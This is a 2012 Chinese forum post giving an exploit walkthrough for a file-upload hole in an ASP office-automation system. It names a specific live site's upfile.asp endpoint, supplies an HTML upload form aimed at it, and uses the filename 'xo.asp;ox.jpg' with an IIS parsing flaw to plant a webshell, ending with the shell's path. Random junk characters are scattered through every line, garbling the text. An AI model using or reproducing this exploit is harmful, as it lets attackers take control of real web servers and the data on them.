全能OA办公系统 上传漏洞
0 F7 z% @# G7 F P; k1 m7 A
. k+ w) W- P. ?3 T( A系统介绍:
2 H5 k0 w0 a" l6 P5 ~ t6 |$ o5 F5 C$ z+ q2 x% r" R5 P/ N
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。 D2 V6 J2 a6 M' t
! B( X v% w% _" ?4 Q/ t主要功能:9 @: V! S9 V& B$ D' \8 V! X
公司通告
. F- }. @) A) [4 L8 K工作计划
. h: D- L% D E# u* C3 D通讯助理
' d( }1 i2 T+ P客户资源
7 C' P7 H+ G6 z; v8 _( Y我的公文
! A" g; C2 |' n8 e公文传阅
, H0 ^0 x- f# ]. U4 n公共资源 3 p" o+ w& I( f+ t$ S
资源预约 6 p& d& e) [$ I' M
今日考勤
% \. k0 |) \- P0 N6 o个人计划 % E3 _) h% c: [, ~) h) ]
个人通讯录 / Q5 n8 u3 }) j% l
个人基本档案
) N. a& }( i2 N+ q7 H( K# }. I未读邮件
j# X/ e+ |2 B( y: h发邮件
9 ^0 K& ^- g: k5 Y收件夹
% X7 G/ Y: Y% e; g( ]+ N: z寄件夹
1 @3 E- n1 U4 ]8 x! r网络硬盘 & C6 W& C' G. W" m, B) ~1 ^
网络会议
6 k3 |6 M$ Q0 B% R1 U网络调查
" i( D* ?! j5 r% N) f* s交流论坛
1 I, R" K% h6 s0 X' y5 d* G
; A$ H( v# m7 `# K! }& z: T有兴趣测试的朋友可以下源码看看
/ C$ m6 m2 Z& Q6 z" d; d9 R( X
/ _* E, w$ F! L8 c5 y源码下载:
$ r' w y( V# H! ^; Z. G9 v6 i4 u# e e- Q
http://www.mycodes.net/30/4750.htm+ z/ @ P r) J) X, h4 _
; p! b2 s& k8 i) y& C2 Q
漏洞介绍:* ~% \0 y4 D; g; B O/ ]
' B5 i4 M5 X; o( n) M4 O. L8 Y
由upfile.asp上传文件漏洞引起0 x# s7 K; H- x+ N9 Z
8 l ~' S+ f+ ?3 A测试方法:
' ?! {. P! W! O v* N
- m& {+ y, V- @5 N0 d; {使用名小子上传http://www.itlynn.com/upfile.asp即可2 l0 c6 X$ g& _3 W0 @
/ }5 J# t0 k" f
如果upfile.asp文件被删除不存在。
# S1 X& J( I' I$ ~4 s1 [7 ~0 l% G R F) R7 O) ^+ h
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。; s* e3 _- a- Z S5 a# L5 W v2 [" D) N
) E+ ^( A! N5 h5 G
如果存在那么将如下代码保存为upfile.html。
" d( b% g9 P- ^& D v* [. S5 H4 s7 _! @$ w, z' H8 R. a
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。4 x# J0 \( y( p- k. o! R
0 A9 L* x# [2 ~3 ^1 ^& j
& B* ^" A* F% ]4 s
) [3 ~' o$ T- f1 x: w/ W01 <table border='0' align="center" cellpadding="5"> , u) R1 U K L5 l
8 b1 X; Y" I! W: h) b02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
: O7 [, f0 }2 n7 n$ O6 W! _7 J( g: N0 E3 Y, x
03 <tr>
& @- m* Z1 `) X, k1 o3 K
& H0 g8 z$ G/ P) k. N/ V04 <td>报错:</td> : V& A2 m) {) X
3 h8 i; P5 G5 W05 <td><input type='radio' name='errnumber' value='0'>
0 g5 C- G8 I$ a+ e/ L2 Q. d* \2 N$ l, ]$ j9 w
06 自动更名
- Q7 l/ `# N- Z' e* p0 B
2 G$ n! T Q2 S07 <input type='radio' name='errnumber' value='1' checked> 5 y2 g2 L4 w, j2 S: @
7 f0 E! y" j, D7 `1 l/ a% R08 报错方式 ( _: r- B7 @! d; F( ~$ Q- D
/ B4 {4 p& x. \/ t6 J% {6 @ O
09 <input type='radio' name='errnumber' value='2'> - J( o/ V6 l. V: p- ~/ B) ^
2 h& V( S0 U, Y# s% [( X10 直接覆盖</td> + ^3 _$ \& S) M6 k% A, u
! m# P+ p- d% ^- w" U+ c: s% v
11 </tr>
8 q2 \% e* E) D& n7 c5 [0 i9 ^+ {7 g. M5 z$ F ?& F
12 <tr>
- c3 I9 ]0 H9 Z" y
& e7 H0 p( {$ o8 T7 a13 <td>主题:</td> * [: ^. ~$ i% \: p: `8 P2 \+ u
7 i9 ^# S e- X4 |9 }+ D14 <td><input type='text' name='filename' size='30'></td>
) M- z& ~, [9 h/ o5 T
* ~% J u' J' O8 {' a( T15 </tr> ' |. K% |; W5 P
3 _5 Z" o; u5 J# P6 K
16 <tr> 0 ^1 Q* s1 A6 K* I+ a* A1 D, j) q, L* u
' [0 D; a; e/ v% k
17 <td>文件:</td> ; Y9 Y3 G( T/ B+ r& l6 @3 f
9 K% I( z/ q6 r) n
18 <td><input type="file"name="fruit"size="30"></td> I, z( a/ B% ~6 s" L9 n
% A$ h1 Q7 x/ c M
19 </tr> W1 I; r6 P2 ^6 [; d4 z V$ A" M
4 q& ~ H$ i' E# h. E6 f20 <tr>
1 ]: T; B2 L! I' ?1 k0 O1 V6 v0 ]* y& c) Z! m8 }
21 <td valign='top'>简介:</td> 8 h1 Q# z' B1 |( X
/ T4 _) A1 r5 T0 q- {
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
% }' Q7 ]% ~' N9 s
6 q0 P6 I4 k* G, y6 Y; T23 </tr> : j6 E0 \ n; M
+ G* i$ B- l3 y4 H+ x6 Y! N
24
- N* l2 G, d% E, k/ k
+ l" g" M' s2 E5 q C4 Y25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
) s- x9 F! t* L/ l3 q9 s2 D1 [. x W D) d! ?
26 </tr> : A% N3 Y; T* v0 \$ G6 y
7 J. X# \0 t" g+ @! n5 d/ F
27 </form> & m2 ^; m+ v# l/ `" A
* G% R4 H& O' A. e' k2 |然后打开上传一个文件名为xo.asp;ox.jpg的文件。
; y: X5 o) q C+ Q3 k" @# G) B; ?, r
( W$ c# Q2 X# w, G6 Q, x) P' m1 d9 u- J( W0 E. Y3 ]6 T& q+ K* D% M
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
9 J3 B/ V' |9 i8 H {" W- T9 {9 ~% m5 d: [' M' l% F9 U
此漏洞需要配合解析漏洞利用。, D& z9 j$ {; |; b; w
0 v2 H4 q: _ v
|
发表于 2012-11-21 13:45:12
收藏
分享
支持
反对